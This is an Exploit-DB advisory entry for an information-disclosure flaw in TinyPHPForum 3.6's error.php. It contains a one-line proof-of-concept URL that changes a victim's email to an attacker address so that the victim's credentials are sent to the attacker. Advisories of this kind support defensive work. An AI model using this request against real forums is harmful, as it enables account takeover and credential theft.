TinyPHPForum 3.6 Error.PHP Information Disclosure Vulnerability

2006-08-01T00:00:00
ID EDB-ID:28322
Type exploitdb
Reporter SirDarckCat
Modified 2006-08-01T00:00:00

Description

TinyPHPForum 3.6 Error.PHP Information Disclosure Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/19278/info

TinyPHPForum is prone to an information-disclosure vulnerability. This issue arises when a script allows a remote untrusted source to change a victim user's email address, and have their login credentials returned to an attacker. 

Information that the attacker gathers by exploiting this vulnerability may aid in other attacks.

http://www.example.com/error.php?err=200&uname=victim&email=attacker@example.com